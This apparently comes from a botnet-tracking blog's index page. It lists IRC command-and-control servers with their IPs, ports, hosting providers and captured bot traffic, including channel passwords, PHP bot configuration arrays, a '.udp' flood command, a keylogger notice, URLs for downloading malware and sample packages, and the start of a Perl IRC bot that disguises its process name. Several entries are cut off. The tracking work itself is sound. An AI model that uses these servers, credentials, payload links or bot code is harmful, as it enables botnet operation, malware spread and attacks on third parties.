Remote Host Port Number 199.15.234.7 80 70.34.196.90 1888 PASS strike NICK n{US|XPa}vihzehv USER vihzehv 0 0 :vihzehv JOIN #asdf strike JOIN #XP JOIN #US hosting infos: http://whois.domaintools.com/70.34.196.90
nooip.no-ip.org (rat hosted in United States Gigenet)
Resolved : [nooip.no-ip.org] To [69.65.19.116] Resolved : [nooip.no-ip.org] To [69.65.19.117] – TCP Connection Attempts: 69.65.19.116:81 69.65.19.117:81 exe file: http://b809236e.whackyvidz.com hosting infos: http://whois.domaintools.com/69.65.19.116
82.114.82.60(linux bots hosted in Serbia Kujtesa Net Sh.p.k)
var $config = array(“server”=>”82.114.82.60”, “port”=>”5454”, “pass”=>””, “prefix”=>”chk-“, “maxrand”=>”4”, “chan”=>”#fuck”, “chan2″=>”#fuck”, “key”=>”ok”, “modes”=>”+p”, “password”=>”ok”, “trigger”=>”.”, “hostauth”=>”*” hosting infos: http://whois.domaintools.com/82.114.82.60
174.127.115.9(linuxbots hosted in United States Providence Hosting Services Inc)
var $config = array(“server”=>”174.127.115.9”, “port”=>”2525”, “pass”=>””, “prefix”=>”RR|”, “maxrand”=>”8”, “chan”=>”#RR”, “chan2″=>””, “key”=>””, “modes”=>”+p”, “password”=>”pass”, “trigger”=>”.”, “hostauth”=>”*” Now talking in #RR Topic On: [ #RR ] [ 174.36.56.72 Room ! ] Topic By: [ DnsZ ] Modes On: [ #RR ] [ +nts ] hosting infos: http://whois.domaintools.com/174.127.115.9
109.68.191.160(ngrBot hosted in Russian Federation Moscow Jsc Tel Company)
Remote Host Port Number 109.68.191.160 1863 PRIVMSG #IrcPeru :[DNS]: Blocked 0 domain(s) – Redirected 40 domain(s) NICK n{US|XPa}civmqel USER civmqel 0 0 :civmqel JOIN #IrcPeru PeruRulz!! JOIN #US PRIVMSG #IrcPeru :[d=”http://magicforkidsparty.com/images/Thumbs.db.exe” s=”159744 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataQcxaxq.exe” – Download retries: 0 174.120.234.158 80 199.15.234.7 80 200.63.96.41 80 PRIVMSG #IrcPeru :[DNS]: Blocked 0Read more...
119.59.99.235(ngrBot hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)
Remote Host Port Number 119.59.99.235 1234 PASS priv9 199.15.234.7 80 NICK n{US|XP}xqtebyy USER xqtebyy 0 0 :xqtebyy JOIN #ngr HELO Now talking in #ngr Topic On: [ #ngr ] [ .stop right there ] Topic By: [ bob ] * Home.Town sets mode: +o ru (ru) .udp 82.8.195.242 8080 120 (ru) .udp 82.8.195.242 8080 120Read more...
cyba.sytes.net(irc botnet hosted in Seychelles Ideal Solution Ltd)
Resolved : [cyba.sytes.net] To [193.107.16.150] Remote Host Port Number 193.107.16.150 20 NICK NEW[XX][XP]6615537921 USER 6615 “” “TsGh” :6615 MODE NEW[XX][XP]6615537921 JOIN #yup JOIN #ys PONG :irc.kittynet.com Remote Host Port Number 193.107.16.47 20 96.9.162.23 80 NICK NEW[XX][XP]4288113806 JOIN #galla PRIVMSG #galla :Down & Exc…OK PONG :irc.kittynet.com USER 4288 “” “TsGh” :4288 MODE NEW[XX][XP]4288113806 JOIN #ys PRIVMSGRead more...
64.32.28.19(irc botnet hosted in United States Huntington Beach Sharktech Internet Services)
Remote Host Port Number 64.32.28.19 6667 USER ^GCIeq`{TehIQ[yuE ^GCIeq`{TehIQ[yuE “^GCIeq`{TehIQ[yuE” :^GCIeq`{TehIQ[yuE NICK ^GCIeq`{TehIQ[yuE PONG 422 JOIN #ib :insbt PRIVMSG #ib :keylogger enabled hosting infos: http://whois.domaintools.com/64.32.28.19
90mb malware samples
another package with 90mb malware samples have fun reversing Download: http://e12ade83.urlbeat.net
216.245.202.52(linux bot hosted in United States Limestone Networks Inc)
here the bot used from heckers: #!/usr/bin/perl ################################################ use HTTP::Request; # use HTTP::Request::Common; # use HTTP::Request::Common qw(POST); # use LWP::Simple; # use LWP 5.53; # use LWP::UserAgent; # use Socket; # use IO::Socket; # use IO::Socket::INET; # use IO::Select; # use MIME::Base64; # ################################################ my $datetime = localtime; my $fakeproc = "/usr/sbin/apache2 -k start"; myRead more...